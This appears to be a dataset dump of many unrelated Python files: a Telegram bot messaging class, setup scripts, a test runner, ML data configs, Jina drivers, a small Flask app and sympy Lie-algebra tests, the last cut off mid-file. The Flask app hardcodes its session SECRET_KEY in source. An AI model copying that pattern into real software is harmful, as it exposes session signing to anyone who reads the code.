content stringlengths 5 1.05M |
|---|
""" A class to send updateable content messages to Telegram. """
import os
import json
import imghdr
from uuid import uuid4
from io import BytesIO
from concurrent.futures import ThreadPoolExecutor
from urllib3 import PoolManager
class TelegramMessage:
""" Class to send a message with text or image (either a matplotlib figure or path to photo) to a Telegram bot.
On subsequent updates, the same message is edited to avoid clutter in notifications.
By default, all messages are silent (with no notifications).
All of Telegram updates are send with `urllib3`, with no usage of official Telegram Python API.
Message updates are performed in a separate thread to avoid IO constraints.
One must supply telegram `token` and `chat_id` either by passing directly or
setting environment variables `TELEGRAM_TOKEN` and `TELEGRAM_CHAT_ID`. To get them:
- create a bot <https://core.telegram.org/bots#6-botfather> and copy its `{token}`
- add the bot to a chat and send it a message such as `/start`
- go to <https://api.telegram.org/bot`{token}`/getUpdates> to find out the `{chat_id}`
"""
API = 'https://api.telegram.org/bot'
USER_AGENT = 'Python Telegram Bot (https://github.com/python-telegram-bot/python-telegram-bot)'
def __init__(self, token=None, chat_id=None, silent=True, content=None):
# Connection
self.token = token or os.getenv('TELEGRAM_TOKEN')
self.chat_id = chat_id or os.getenv('TELEGRAM_CHAT_ID')
if self.token is None or self.chat_id is None:
raise ValueError('Supply `token` and `chat_id` or '
'set `TELEGRAM_TOKEN` and `TELEGRAM_CHAT_ID` environment variables!')
self.connection = PoolManager()
# State
self.deleted = False
self.silent = silent
# Keep track of the message, its type and previous contents
self.message_id = None
self.message_type = None
self.message_content_hash = None
# A separate worker to send requests
self.pool = ThreadPoolExecutor(max_workers=1)
self.queue = []
if content is not None:
self.send(content)
def submit(self, function, *args, **kwargs):
""" Run tasks in a separate thread, keeping at most two tasks in a queue: one running, one waiting. """
if len(self.queue) == 2:
if self.queue[0].done():
# The first task is already done, means that the second is running
# Remove the first, make running the first, put new task as the second
self.queue.pop(0)
else:
# The first task is running, so we can replace the waiting task with the new one
self.queue.pop(1).cancel()
try:
waiting = self.pool.submit(function, *args, **kwargs)
self.queue.append(waiting)
except Exception as e: #pylint: disable=broad-except
print(e)
def post(self, action, **kwargs):
""" Send a `POST` request with `action` to Telegram API.
We use the same headers, as used in official Telegram Python API implementation, see
<https://github.com/python-telegram-bot/python-telegram-bot/blob/master/telegram/utils/request.py>`_".
"""
url = f'{self.API}{self.token}/{action}'
fields = {'chat_id': self.chat_id, **kwargs}
headers = {'connection': 'keep-alive', 'user-agent': self.USER_AGENT}
return self.connection.request('POST', url, fields=fields, headers=headers)
def send(self, content):
""" Send content to a message in a separate thread. """
if self.deleted:
raise TypeError('Sending contents to a deleted message is not allowed!')
self.submit(function=self._send, content=content)
# Wait for the first message
if self.message_id is None:
self.queue[0].result()
def _send(self, content):
# No need to re-send the same content
if hash(content) == self.message_content_hash:
return None
# Assert the same type of contents to send, as in initialization
message_type = 'text' if isinstance(content, str) else 'media'
if self.message_type and self.message_type != message_type:
raise TypeError('Sending different types of content in the same message is not allowed!')
# First message: initialization
if self.message_id is None:
if message_type == 'text':
response = self.post('sendMessage', text=content,
disable_notification=self.silent, parse_mode='MarkdownV2')
else:
data = self.content_to_dict(content)
response = self.post('sendMediaGroup', **data,
disable_notification=self.silent)
response_ = json.loads(response.data.decode())['result']
response_ = response_[0] if isinstance(response_, list) else response_
self.message_id = response_['message_id']
self.message_type = message_type
# Subsequent messages: updating contents by editing the message
else:
if message_type == 'text':
response = self.post('editMessageText', text=content,
message_id=self.message_id, parse_mode='MarkdownV2')
else:
data = self.content_to_dict(content, group=False)
response = self.post('editMessageMedia', **data,
message_id=self.message_id)
self.message_content_hash = hash(content)
return response
def delete(self):
""" Cancel pending message updates and remove it. """
for task in self.queue:
if not task.running():
task.cancel()
self.pool.shutdown(wait=True)
if self.message_id is not None:
self.post('deleteMessage', message_id=self.message_id)
self.deleted = True
@staticmethod
def content_to_dict(content, group=True, **kwargs):
""" Convert a content (either a path to photo or matplotlib figure) to a telegram-acceptable dictionary. """
# Convert content to a bytestring
if isinstance(content, str):
bytes_ = TelegramMessage.path_to_bytes(content)
else:
bytes_ = TelegramMessage.figure_to_bytes(content, **kwargs)
# Create unique id of attachment, pack entities in json
attach_id = f'attached{uuid4().hex}'
attach_fmt = imghdr.what(None, bytes_)
media_dict = {'media': f'attach://{attach_id}', 'type': 'photo'}
media_dict = [media_dict] if group else media_dict
media_dict = json.dumps(media_dict)
# Resulting dictionary: `media` references the attachment, which is stored as a separate key
return {'media': media_dict,
attach_id: ('image', bytes_, attach_fmt)}
@staticmethod
def path_to_bytes(path, **_):
""" Read image file contents as a bytestring. """
with open(path, 'rb') as file:
return file.read()
@staticmethod
def figure_to_bytes(figure, **kwargs):
""" Save figure to a buffer in memory, then read from it. """
kwargs = {'format': 'png', 'dpi': 100,
'bbox_inches': 'tight', 'pad_inches': 0,
**kwargs}
file = BytesIO()
figure.savefig(file, **kwargs)
file.seek(0)
return file.read()
|
from setuptools import setup
import setuptools, os
descr = 'Image process framework based on plugin like imagej, it is esay to glue with scipy.ndimage, scikit-image, opencv, simpleitk, mayavi...and any libraries based on numpy'
def get_data_files():
dic = {}
for root, dirs, files in os.walk('imagepy', True):
root = root.replace('/', '.').replace('\\', '.')
files = [i for i in files if not '.py' in i]
if len(files)==0:continue
dic[root] = files
return dic
if __name__ == '__main__':
setup(name='imagepy',
version='0.22',
url='https://github.com/Image-Py/imagepy',
description='interactive python image-processing plugin framework',
long_description=descr,
author='YXDragon',
author_email='yxdragon@imagepy.org',
license='BSD 3-clause',
packages=setuptools.find_packages(),
entry_points={
'console_scripts': [
'imagepy = imagepy:show',
],
},
package_data=get_data_files(),
install_requires=[
'scikit-image',
'scikit-learn',
'shapely',
'pypubsub',
'wxpython',
'read_roi',
'numpy-stl',
'pydicom',
'pystackreg',
'pandas',
'xlrd',
'xlwt',
'openpyxl',
'markdown',
'python-markdown-math',
'numba',
'dulwich'
],
)
|
import torch
import torchvision
from torch.utils.tensorboard import SummaryWriter
from torchvision import datasets, transforms
# Writer will output to ./runs/ directory by default
writer = SummaryWriter()
transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5,), (0.5,))])
trainset = datasets.MNIST('mnist_train', train=True, download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=64, shuffle=True)
model = torchvision.models.resnet50(False)
# Have ResNet model take in grayscale rather than RGB
model.conv1 = torch.nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)
images, labels = next(iter(trainloader))
grid = torchvision.utils.make_grid(images)
writer.add_image('images', grid, 0)
writer.add_graph(model, images)
writer.close()
|
#!/usr/bin/env python
# Execute this script to run through all tests (wrap, build, run).
# Check that the correct Fortran compiler is set in Tests.mk. If
# necessary, add "-c gfortran" to OPTS below (gfortran name mangling
# is currently the default)
from __future__ import print_function
import sys
import os
import glob
import subprocess
OPTS = '-g --clean -d wrap' # FortWrap options
# Add the executable to the command. This way the tests are run with
# the chosen python instead of the default
cmd = sys.executable + ' ' + os.path.normpath('../../fortwrap.py')
custom_opts = { 'c_arrays' : OPTS + ' --no-vector',
'interface_file' : OPTS + ' -i interface.i',
'multidim_arrays' : OPTS + ' --no-vector --no-fmat',
'strings2' : OPTS + ' --no-std-string' }
# Tests for demonstration purposes only:
excludes = [ 'comments' ]
tests_dir = os.path.abspath('tests')
os.chdir('tests')
tests = glob.glob('*')
num_err = 0
FNULL = open(os.devnull, 'w')
# Use a command arg to prevent making clean
make_clean = True
if len(sys.argv) > 1:
print("Not making clean")
make_clean = False
failed_tests = []
for test in tests:
os.chdir(tests_dir)
if test in excludes or (not os.path.isdir(test)):
continue
if not os.path.exists(os.path.join(test, 'Makefile')):
# This can happen if there are leftover directories for tests
# that only exist on a different branch
continue
print("Running test:", test, end=' ')
os.chdir(test)
# Create "wrap" directory if doesn't exist:
if not os.path.exists('wrap'):
os.makedirs('wrap')
# Run wrapper generator
if test in custom_opts:
opts = custom_opts[test]
else:
opts = OPTS
if make_clean:
subprocess.call('make clean', stdout=FNULL, shell=True)
p = subprocess.Popen(cmd + ' ' + opts, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = p.communicate()
if p.returncode != 0 or 'Error:' in stderr.decode():
num_err += 1
failed_tests.append((test,'wrapper'))
print("[FAIL: wrapper]")
continue
# Build test program
stat = subprocess.call('make', stdout=FNULL)
if stat!=0:
num_err += 1
failed_tests.append((test,'build'))
print("[FAIL: build]")
continue
# Run test program
#
# This command can be tricky on Windows if the path contains
# spaces. With os.system, they need to be protected with outer
# quotes (so Windows sees the quotes); that isn't necessary with
# subprocess.call
stat = subprocess.call(os.path.abspath('prog'))
if stat!=0:
num_err += 1
failed_tests.append((test,'run'))
print("[FAIL: run]")
continue
print("[PASS]")
if num_err == 0:
print("Tests successful")
else:
print(num_err, "error(s):", failed_tests)
|
from dataclasses import dataclass
from typing import List
@dataclass
class InceptionConfiguration:
smiles: List[str]
memory_size: int
sample_size: int
|
# Solution of MarchCode Day 3
print("""Choose a number corresponding to the month
1. January
2. February
3. March
4. April
5. May
6. June
7. July
8. August
9. September
10. October
11. November
12. December""")
n =int(input("Enter the number here: \n"))
if (n == 1 or n == 3 or n == 5 or n == 7 or n == 8 or n == 10 or n == 12):
print("31 days")
elif (n == 4 or n == 6 or n == 9 or n == 11):
print("30 days")
elif (n == 2):
print("28/29 days")
else:
print("Please choose a number between 1 to 12")
|
from libai.config import LazyCall
from omegaconf import OmegaConf
from libai.data import build_nlp_test_loader, build_nlp_train_val_test_loader
from libai.data.datasets import GPT2Dataset
from libai.data.data_utils import get_indexed_dataset
from libai.tokenizer import GPT2Tokenizer
tokenization = OmegaConf.create()
tokenization.tokenizer = LazyCall(GPT2Tokenizer)(
vocab_file="/workspace/data/gpt_dataset/gpt2-vocab.json",
merges_file="/workspace/data/gpt_dataset/gpt2-merges.txt",
do_lower_case=True,
do_chinese_wwm=True,
)
tokenization.append_eod = False
tokenization.make_vocab_size_divisible_by = 128
dataloader = OmegaConf.create()
dataloader.train = LazyCall(build_nlp_train_val_test_loader)(
dataset=[
LazyCall(GPT2Dataset)(
data_prefix="/workspace/data/libai_dataset/loss_compara_content_sentence",
indexed_dataset=LazyCall(get_indexed_dataset)(
data_prefix="/workspace/data/libai_dataset/loss_compara_content_sentence",
data_impl="mmap",
skip_warmup=False,
),
max_seq_length=1024,
),
],
splits=[[949.0, 50.0, 1.0]],
weights=[1.0],
num_workers=0,
)
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
''' Computational semantics course @ RUG-2019
Lecturer: L.Abzianidze@rug.nl
Assignment 4: Natural language inference with first-order logic theorem proving
'''
def codalab_html(scores, cm, filename):
'''Write an html file with scores and a confusion matrix
'''
# internal css style and other styling
(acc, prec, rec) = scores
style = ("table, th, td { border: 1px solid black; border-collapse: collapse;}\n"
"td {text-align: right;}\n"
".ltd {text-align: left;}\n"
".lab, th {background-color: #648ca8; color: #fff;}\n"
"th, td {padding: 2px 10px 2px 10px;}\n"
".diag {background-color: #77dd77;}\n"
)
header = '<head>\n<title>Detailed results</title>\n<style>\n{}\n</style>\n</head>'.format(style)
tag = 'p'
# create a confusion table
body = '<table>\n'
body += '<tr>\n<th style="color:black">Gold \ Pred</th>\n<th>C</th>\n<th>E</th>\n<th>N</th>\n</tr>\n'
for g in ['CONTRADICTION', 'ENTAILMENT', 'NEUTRAL']:
body += '<tr>\n<td class="ltd lab"><b>{}<b></td>\n'.format(g)
for p in 'CEN':
sty = ' class="diag"' if g[0] == p else ''
body += '<td{}>{}</td>\n'.format(sty, cm[(g[0],p)])
body += '</tr>\n'
body += '</table>\n'
# generating the content
body += '<{0}>Accuracy: <b>{1}</b></{0}>\n'.format(tag, round(acc, 4))
body += '<{0}>Precision: <b>{1}</b></{0}>\n'.format(tag, round(prec, 3))
body += '<{0}>Recall: <b>{1}</b></b></{0}>\n'.format(tag, round(rec, 3))
html = '<!DOCTYPE html>\n<meta charset=utf-8>\n<html>\n{}\n<body>\n{}\n</body>\n</html>'.format(header, body)
with open(filename, 'w') as f:
f.write(html)
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or '**************'
MYSQL_USER = os.environ.get('MYSQL_DATABASE_USER') or 'root'
MYSQL_PASSWORD = os.environ.get('MYSQL_DATABASE_PASSWORD') or ''
MYSQL_DB = os.environ.get('MYSQL_DATABASE_DB') or 'metro-hacks'
MYSQL_HOST = os.environ.get('MYSQL_DATABASE_HOST') or 'localhost'
SESSION_PERMANENT = False
SESSION_COOKIE_SAMESITE=None
SESSION_COOKIE_SECURE=True
|
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import ctypes
import random
from . import BaseExecutableDriver
from .helper import array2pb, pb_obj2dict, pb2array
class BaseCraftDriver(BaseExecutableDriver):
"""Drivers inherited from this Driver will bind :meth:`craft` by default """
def __init__(self, executor: str = None, method: str = 'craft', *args, **kwargs):
super().__init__(executor, method, *args, **kwargs)
class ChunkCraftDriver(BaseCraftDriver):
"""Craft the chunk-level information on given keys using the executor
"""
def __call__(self, *args, **kwargs):
no_chunk_docs = []
for d in self.req.docs:
if not d.chunks:
no_chunk_docs.append(d.doc_id)
continue
_chunks_to_add = []
for c in d.chunks:
_args_dict = pb_obj2dict(c, self.exec.required_keys)
if 'blob' in self.exec.required_keys:
_args_dict['blob'] = pb2array(c.blob)
ret = self.exec_fn(**_args_dict)
if isinstance(ret, dict):
for k, v in ret.items():
if k == 'blob':
c.blob.CopyFrom(array2pb(v))
else:
setattr(c, k, v)
continue
if isinstance(ret, list):
for chunk_dict in ret:
_chunks_to_add.append(chunk_dict)
if len(_chunks_to_add) > 0:
for c_dict in _chunks_to_add:
c = d.chunks.add()
for k, v in c_dict.items():
if k == 'blob':
c.blob.CopyFrom(array2pb(v))
elif k == 'chunk_id':
self.logger.warning(f'you are assigning a chunk_id in in {self.exec.__class__}, '
f'is it intentional? chunk_id will be override by {self.__class__} '
f'anyway')
else:
setattr(c, k, v)
c.length = len(_chunks_to_add) + len(d.chunks)
c.chunk_id = random.randint(0, ctypes.c_uint(-1).value)
d.length = len(_chunks_to_add) + len(d.chunks)
if no_chunk_docs:
self.logger.warning('these docs contain no chunk: %s' % no_chunk_docs)
class DocCraftDriver(BaseCraftDriver):
"""Craft the doc-level information on given keys using the executor
"""
def __call__(self, *args, **kwargs):
for d in self.req.docs:
ret = self.exec_fn(**pb_obj2dict(d, self.exec.required_keys))
for k, v in ret.items():
setattr(d, k, v)
class SegmentDriver(BaseCraftDriver):
"""Segment document into chunks using the executor
.. note::
``chunk_id`` is auto-assign incrementally or randomly depends on ``first_chunk_id`` and ``random_chunk_id``.
no need to self-assign it in your segmenter
"""
def __init__(
self, first_chunk_id: int = 0, random_chunk_id: bool = True, save_raw_bytes: bool = False, *args, **kwargs):
super().__init__(*args, **kwargs)
self.first_chunk_id = first_chunk_id
self.random_chunk_id = random_chunk_id
self.save_raw_bytes = save_raw_bytes
def __call__(self, *args, **kwargs):
for d in self.req.docs:
ret = self.exec_fn(**pb_obj2dict(d, self.exec.required_keys))
if ret:
for r in ret:
c = d.chunks.add()
for k, v in r.items():
if k == 'blob':
c.blob.CopyFrom(array2pb(v))
elif k == 'chunk_id':
self.logger.warning(f'you are assigning a chunk_id in in {self.exec.__class__}, '
f'is it intentional? chunk_id will be override by {self.__class__} '
f'anyway')
else:
setattr(c, k, v)
c.length = len(ret)
c.chunk_id = self.first_chunk_id if not self.random_chunk_id else random.randint(0, ctypes.c_uint(
-1).value)
c.doc_id = d.doc_id
self.first_chunk_id += 1
d.length = len(ret)
if self.save_raw_bytes:
d.meta_info = d.raw_bytes
else:
self.logger.warning('doc %d gives no chunk' % d.doc_id)
|
from flask import Flask, request, redirect, render_template, flash, jsonify
from flaskmogrify.forms import TransmogrificationForm
__author__ = 'Daniel Langsam'
__email__ = 'daniel@langsam.org'
__version__ = '0.0.16'
app = Flask(__name__)
app.config.from_object(__name__)
app.config.update(dict(
SECRET_KEY='super_hard_to_guess_secret_key_1231214123167545',
))
@app.route('/get_transmogrification',methods=['POST'])
def transmogrify_wihtout_AJAX():
fcn_index = int(request.form['radio_tfunction'])
tfunction = app.config['transmogrify_functions'][fcn_index]
return render_template('/results_non_AJAX.html',
display_text=str(tfunction(request.form['data_to_transmogrify_field'])))
@app.route('/get_transmogrification_by_ajax', methods=['POST'])
def ajax_transmogrify():
tfunction = app.config['transmogrify_functions'][int(request.form['tfunction_index'])]
return jsonify({ 'text': tfunction(request.form['text'])})
@app.route('/transmogrify', methods=['GET','POST'])
def transmogrify_main():
form = TransmogrificationForm()
if form.validate_on_submit(): # non-AJAX fallback, e.g. if Javascript disabled
flash("Transmogrification complete!")
return redirect('/get_transmogrification') #/results_non_AJAX.html',
form.radio_choices.choices = [fcn.__name__ for fcn in app.config['transmogrify_functions']]
return render_template('transmogrify.html',
title="Lab Data Entry",
form=form,
example_text=app.config['transmogrify_sample_text'])
@app.route('/')
def redirect_to_transmogrify_main():
return redirect("/transmogrify")
|
from liesym import F4, E, Basis
from sympy import Matrix, Rational, S
def test_F4():
F4_ = F4()
# test subclass items
assert F4_.dimension == 4
assert F4_.n_pos_roots == 24
assert F4_.simple_roots == [
Matrix([[1, -1, 0, 0]]),
Matrix([[0, 1, -1, 0]]),
Matrix([[0, 0, 1, 0]]),
Matrix([[-S.Half, -S.Half, -S.Half, -S.Half]]),
]
fw = F4_.fundamental_weights[0]
assert fw.basis == Basis.ORTHO
assert F4_.to_omega(fw) == Matrix([[1, 0, 0, 0]])
# baseclass generated
assert F4_.cartan_matrix == Matrix(
[[2, -1, 0, 0], [-1, 2, -2, 0], [0, -1, 2, -1], [0, 0, -1, 2]])
assert F4_.cocartan_matrix == Matrix(
[[1, -1, 0, 0], [0, 1, -1, 0], [0, 0, 2, 0], [-1, -1, -1, -1]])
assert F4_.omega_matrix == Matrix(
[[1, 0, 0, -1], [1, 1, 0, -2], [S.Half, S.Half, S.Half, -3*S.Half], [0, 0, 0, -1]])
assert F4_.metric_tensor == Matrix(
[[2, 3, 2, 1], [3, 6, 4, 2], [2, 4, 3, 3*S.Half], [1, 2, 3*S.Half, 1]])
assert F4_.reflection_matricies == [
Matrix([
[0, 1, 0, 0],
[1, 0, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]]),
Matrix([
[1, 0, 0, 0],
[0, 0, 1, 0],
[0, 1, 0, 0],
[0, 0, 0, 1]]),
Matrix([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, -1, 0],
[0, 0, 0, 1]]),
Matrix([
[S.Half, -S.Half, -S.Half, -S.Half],
[-S.Half, S.Half, -S.Half, -S.Half],
[-S.Half, -S.Half, S.Half, -S.Half],
[-S.Half, -S.Half, -S.Half, S.Half]])]
assert F4_.fundamental_weights == [Matrix([[1, 0, 0, -1]]), Matrix(
[[1, 1, 0, -2]]), Matrix([[S.Half, S.Half, S.Half, -3*S.Half]]), Matrix([[0, 0, 0, -1]])]
# backend
assert [F4_.to_omega(x) for x in F4_.root_system()] == [
Matrix([[1, 0, 0, 0]]),
Matrix([[-1, 1, 0, 0]]),
Matrix([[0, -1, 2, 0]]),
Matrix([[0, 0, 0, 1]]),
Matrix([[0, 0, 1, -1]]),
Matrix([[0, 1, -2, 2]]),
Matrix([[0, 1, -1, 0]]),
Matrix([[1, -1, 0, 2]]),
Matrix([[-1, 0, 0, 2]]),
Matrix([[0, 1, 0, -2]]),
Matrix([[1, -1, 1, 0]]),
Matrix([[-1, 0, 1, 0]]),
Matrix([[1, -1, 2, -2]]),
Matrix([[1, 0, -1, 1]]),
Matrix([[-1, 0, 2, -2]]),
Matrix([[-1, 1, -1, 1]]),
Matrix([[1, 0, 0, -1]]),
Matrix([[-1, 1, 0, -1]]),
Matrix([[0, -1, 1, 1]]),
Matrix([[1, 1, -2, 0]]),
Matrix([[-1, 2, -2, 0]]),
Matrix([[0, -1, 2, -1]]),
Matrix([[0, 0, -1, 2]]),
Matrix([[2, -1, 0, 0]]),
Matrix([[0, 0, 0, 0]]),
Matrix([[0, 0, 0, 0]]),
Matrix([[0, 0, 0, 0]]),
Matrix([[0, 0, 0, 0]]),
Matrix([[-2, 1, 0, 0]]),
Matrix([[0, 0, 1, -2]]),
Matrix([[0, 1, -2, 1]]),
Matrix([[1, -2, 2, 0]]),
Matrix([[-1, -1, 2, 0]]),
Matrix([[0, 1, -1, -1]]),
Matrix([[1, -1, 0, 1]]),
Matrix([[-1, 0, 0, 1]]),
Matrix([[1, -1, 1, -1]]),
Matrix([[1, 0, -2, 2]]),
Matrix([[-1, 0, 1, -1]]),
Matrix([[-1, 1, -2, 2]]),
Matrix([[1, 0, -1, 0]]),
Matrix([[-1, 1, -1, 0]]),
Matrix([[0, -1, 0, 2]]),
Matrix([[1, 0, 0, -2]]),
Matrix([[-1, 1, 0, -2]]),
Matrix([[0, -1, 1, 0]]),
Matrix([[0, -1, 2, -2]]),
Matrix([[0, 0, -1, 1]]),
Matrix([[0, 0, 0, -1]]),
Matrix([[0, 1, -2, 0]]),
Matrix([[1, -1, 0, 0]]),
Matrix([[-1, 0, 0, 0]]),
]
def test_E6():
E6 = E(6)
# test subclass items
assert E6.dimension == 6
assert E6.n_pos_roots == 36
assert E6.simple_roots == [
Matrix([[S.Half, -S.Half, -S.Half, -S.Half, -
S.Half, -S.Half, -S.Half, S.Half]]),
Matrix([[-1, 1, 0, 0, 0, 0, 0, 0]]),
Matrix([[0, -1, 1, 0, 0, 0, 0, 0]]),
Matrix([[0, 0, -1, 1, 0, 0, 0, 0]]),
Matrix([[0, 0, 0, -1, 1, 0, 0, 0]]),
Matrix([[1, 1, 0, 0, 0, 0, 0, 0]]),
]
fw = E6.fundamental_weights[0]
assert fw.basis == Basis.ORTHO
assert E6.to_omega(fw) == Matrix([[1, 0, 0, 0, 0, 0]])
# baseclass generated
assert E6.cartan_matrix == Matrix([
[2, -1, 0, 0, 0, 0],
[-1, 2, -1, 0, 0, 0],
[0, -1, 2, -1, 0, -1],
[0, 0, -1, 2, -1, 0],
[0, 0, 0, -1, 2, 0],
[0, 0, -1, 0, 0, 2]])
assert E6.omega_matrix == Matrix(
[[0, 0, 0, 0, 0, Rational(-2, 3), Rational(-2, 3), Rational(2, 3)],
[Rational(-1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2),
Rational(1, 2), Rational(-5, 6), Rational(-5, 6), Rational(5, 6)],
[0, 0, 1, 1, 1, -1, -1, 1],
[0, 0, 0, 1, 1, Rational(-2, 3), Rational(-2, 3), Rational(2, 3)],
[0, 0, 0, 0, 1, Rational(-1, 3), Rational(-1, 3), Rational(1, 3)],
[Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(-1, 2), Rational(-1, 2), Rational(1, 2)], ])
assert E6.metric_tensor == Matrix(
[[Rational(4, 3), Rational(5, 3), 2, Rational(4, 3), Rational(2, 3), 1],
[Rational(5, 3), Rational(10, 3), 4,
Rational(8, 3), Rational(4, 3), 2],
[2, 4, 6, 4, 2, 3],
[Rational(4, 3), Rational(8, 3), 4,
Rational(10, 3), Rational(5, 3), 2],
[Rational(2, 3), Rational(4, 3), 2,
Rational(5, 3), Rational(4, 3), 1],
[1, 2, 3, 2, 1, 2], ])
# backend
assert [E6.to_omega(x) for x in E6.root_system()] == [
Matrix([[0, 0, 0, 0, 0, 1]]),
Matrix([[0, 0, 1, 0, 0, -1]]),
Matrix([[0, 1, -1, 1, 0, 0]]),
Matrix([[0, 1, 0, -1, 1, 0]]),
Matrix([[1, -1, 0, 1, 0, 0]]),
Matrix([[-1, 0, 0, 1, 0, 0]]),
Matrix([[0, 1, 0, 0, -1, 0]]),
Matrix([[1, -1, 1, -1, 1, 0]]),
Matrix([[-1, 0, 1, -1, 1, 0]]),
Matrix([[1, -1, 1, 0, -1, 0]]),
Matrix([[1, 0, -1, 0, 1, 1]]),
Matrix([[-1, 0, 1, 0, -1, 0]]),
Matrix([[-1, 1, -1, 0, 1, 1]]),
Matrix([[1, 0, -1, 1, -1, 1]]),
Matrix([[1, 0, 0, 0, 1, -1]]),
Matrix([[-1, 1, -1, 1, -1, 1]]),
Matrix([[-1, 1, 0, 0, 1, -1]]),
Matrix([[0, -1, 0, 0, 1, 1]]),
Matrix([[1, 0, 0, -1, 0, 1]]),
Matrix([[1, 0, 0, 1, -1, -1]]),
Matrix([[-1, 1, 0, -1, 0, 1]]),
Matrix([[-1, 1, 0, 1, -1, -1]]),
Matrix([[0, -1, 0, 1, -1, 1]]),
Matrix([[0, -1, 1, 0, 1, -1]]),
Matrix([[1, 0, 1, -1, 0, -1]]),
Matrix([[-1, 1, 1, -1, 0, -1]]),
Matrix([[0, -1, 1, -1, 0, 1]]),
Matrix([[0, -1, 1, 1, -1, -1]]),
Matrix([[0, 0, -1, 1, 1, 0]]),
Matrix([[1, 1, -1, 0, 0, 0]]),
Matrix([[-1, 2, -1, 0, 0, 0]]),
Matrix([[0, -1, 2, -1, 0, -1]]),
Matrix([[0, 0, -1, 0, 0, 2]]),
Matrix([[0, 0, -1, 2, -1, 0]]),
Matrix([[0, 0, 0, -1, 2, 0]]),
Matrix([[2, -1, 0, 0, 0, 0]]),
Matrix([[0, 0, 0, 0, 0, 0]]),
Matrix([[0, 0, 0, 0, 0, 0]]),
Matrix([[0, 0, 0, 0, 0, 0]]),
Matrix([[0, 0, 0, 0, 0, 0]]),
Matrix([[0, 0, 0, 0, 0, 0]]),
Matrix([[0, 0, 0, 0, 0, 0]]),
Matrix([[-2, 1, 0, 0, 0, 0]]),
Matrix([[0, 0, 0, 1, -2, 0]]),
Matrix([[0, 0, 1, -2, 1, 0]]),
Matrix([[0, 0, 1, 0, 0, -2]]),
Matrix([[0, 1, -2, 1, 0, 1]]),
Matrix([[1, -2, 1, 0, 0, 0]]),
Matrix([[-1, -1, 1, 0, 0, 0]]),
Matrix([[0, 0, 1, -1, -1, 0]]),
Matrix([[0, 1, -1, -1, 1, 1]]),
Matrix([[0, 1, -1, 1, 0, -1]]),
Matrix([[1, -1, -1, 1, 0, 1]]),
Matrix([[-1, 0, -1, 1, 0, 1]]),
Matrix([[0, 1, -1, 0, -1, 1]]),
Matrix([[0, 1, 0, -1, 1, -1]]),
Matrix([[1, -1, 0, -1, 1, 1]]),
Matrix([[1, -1, 0, 1, 0, -1]]),
Matrix([[-1, 0, 0, -1, 1, 1]]),
Matrix([[-1, 0, 0, 1, 0, -1]]),
Matrix([[0, 1, 0, 0, -1, -1]]),
Matrix([[1, -1, 0, 0, -1, 1]]),
Matrix([[1, -1, 1, -1, 1, -1]]),
Matrix([[-1, 0, 0, 0, -1, 1]]),
Matrix([[-1, 0, 1, -1, 1, -1]]),
Matrix([[1, -1, 1, 0, -1, -1]]),
Matrix([[1, 0, -1, 0, 1, 0]]),
Matrix([[-1, 0, 1, 0, -1, -1]]),
Matrix([[-1, 1, -1, 0, 1, 0]]),
Matrix([[1, 0, -1, 1, -1, 0]]),
Matrix([[-1, 1, -1, 1, -1, 0]]),
Matrix([[0, -1, 0, 0, 1, 0]]),
Matrix([[1, 0, 0, -1, 0, 0]]),
Matrix([[-1, 1, 0, -1, 0, 0]]),
Matrix([[0, -1, 0, 1, -1, 0]]),
Matrix([[0, -1, 1, -1, 0, 0]]),
Matrix([[0, 0, -1, 0, 0, 1]]),
Matrix([[0, 0, 0, 0, 0, -1]]),
]
assert [E6.to_omega(x) for x in E6.positive_roots] == [
Matrix([[0, 0, 0, 0, 0, 1]]),
Matrix([[0, 0, 1, 0, 0, -1]]),
Matrix([[0, 1, -1, 1, 0, 0]]),
Matrix([[0, 1, 0, -1, 1, 0]]),
Matrix([[1, -1, 0, 1, 0, 0]]),
Matrix([[-1, 0, 0, 1, 0, 0]]),
Matrix([[0, 1, 0, 0, -1, 0]]),
Matrix([[1, -1, 1, -1, 1, 0]]),
Matrix([[-1, 0, 1, -1, 1, 0]]),
Matrix([[1, -1, 1, 0, -1, 0]]),
Matrix([[1, 0, -1, 0, 1, 1]]),
Matrix([[-1, 0, 1, 0, -1, 0]]),
Matrix([[-1, 1, -1, 0, 1, 1]]),
Matrix([[1, 0, -1, 1, -1, 1]]),
Matrix([[1, 0, 0, 0, 1, -1]]),
Matrix([[-1, 1, -1, 1, -1, 1]]),
Matrix([[-1, 1, 0, 0, 1, -1]]),
Matrix([[0, -1, 0, 0, 1, 1]]),
Matrix([[1, 0, 0, -1, 0, 1]]),
Matrix([[1, 0, 0, 1, -1, -1]]),
Matrix([[-1, 1, 0, -1, 0, 1]]),
Matrix([[-1, 1, 0, 1, -1, -1]]),
Matrix([[0, -1, 0, 1, -1, 1]]),
Matrix([[0, -1, 1, 0, 1, -1]]),
Matrix([[1, 0, 1, -1, 0, -1]]),
Matrix([[-1, 1, 1, -1, 0, -1]]),
Matrix([[0, -1, 1, -1, 0, 1]]),
Matrix([[0, -1, 1, 1, -1, -1]]),
Matrix([[0, 0, -1, 1, 1, 0]]),
Matrix([[1, 1, -1, 0, 0, 0]]),
Matrix([[-1, 2, -1, 0, 0, 0]]),
Matrix([[0, -1, 2, -1, 0, -1]]),
Matrix([[0, 0, -1, 0, 0, 2]]),
Matrix([[0, 0, -1, 2, -1, 0]]),
Matrix([[0, 0, 0, -1, 2, 0]]),
Matrix([[2, -1, 0, 0, 0, 0]]),
]
|
import typing
from eth2spec.fuzzing.decoder import translate_typ, translate_value
from eth2spec.phase0 import spec
from eth2spec.utils import bls
from eth2spec.utils.ssz.ssz_impl import serialize
from preset_loader import loader
# TODO(gnattishness) fix config path difficult to do unless we assume the eth2spec
# module is at a fixed position relative to the configs
# (i.e. it is inside a cloned eth2.0-specs repo)
